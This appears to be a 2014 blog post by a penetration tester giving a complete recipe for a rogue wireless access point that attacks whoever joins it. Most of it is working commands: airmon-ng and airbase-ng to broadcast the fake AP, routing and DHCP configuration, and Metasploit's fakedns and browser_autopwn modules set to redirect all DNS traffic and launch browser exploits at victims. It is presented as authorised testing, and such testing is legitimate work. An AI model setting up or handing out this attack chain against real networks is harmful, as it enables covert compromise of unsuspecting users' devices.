Thursday, February 6, 2014

Autopwning Rogue Access Point FTW

I recently had the opportunity to conduct an internal wireless pen test - Karmetasploit is an awesome script.  However, it can be a headache to setup, as it requires a few different components in order to work.  So, I stripped out what I wanted and came up with my own version of an Autopwning Rogue Access Point.

Basic requirements :

Aircrack-ng suite - You can find it here (recommend compiling the source)
Linux system with Wireless card
isc-dhcp-server ((sudo apt-get install isc-dhcp-server))
Metasploit

Place the wireless card into monitor mode:
sudo airmon-ng start wlan0

Spin up the Rogue AP:
sudo airbase-ng -e "pwn_me" -v mon0

Create a new network for victims (note that the addressing can be anything 10.x.x.x,172.16.x.x,192.168.x.x)
sudo ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
sudo route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
sudo echo '1' > /proc/sys/net/ipv4/ip_forward

If you're using UFW, enable connections in on port 53:
sudo ufw allow 53/udp

Edit the "/etc/dhcp/dhcpd.conf" file and add or replace contents with the code below:
-----DHCP CONFIG-----## /etc/dhcp/dhcpd.conf
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
-----DHCP CONFIG-----

Restart the DHCP server
sudo service isc-dhcp-server restart

Fire up Metasploit and launch the browser_autopwn module (this will take some time):
msf > use auxiliary/server/browser_autopwn

Set the variables:
set LHOST 10.0.0.1
set SRVHOST 10.0.0.1
set SRVPORT 80
set URIPATH /

Launch the fakedns module:
msf > use auxiliary/server/fakedns

Set the variables:
set SRVHOST 10.0.0.1
set SRVPORT 53
set TARGETACTION FAKE
set TARGETDOMAIN *
set TARGETHOST 10.0.0.1

Ok, we're ready to rock. The rogue AP is setup. What we have done is created a wireless access point, DHCP server, DNS, and webserver. A victim connecting to the rogue AP will get an IP address. Then, when the victim attempts to connect out to a website, Metasploit will intercept the DNS request and poison the response (with the AP's IP). Metasploit is listening on TCP port 80 for incoming connections, ready to execute a barrage of browser (and plugin) exploits against the victim. It's important to note that if you are using a host based firewall, you will have to open the reverse connection port to your system, the web port, and DNS.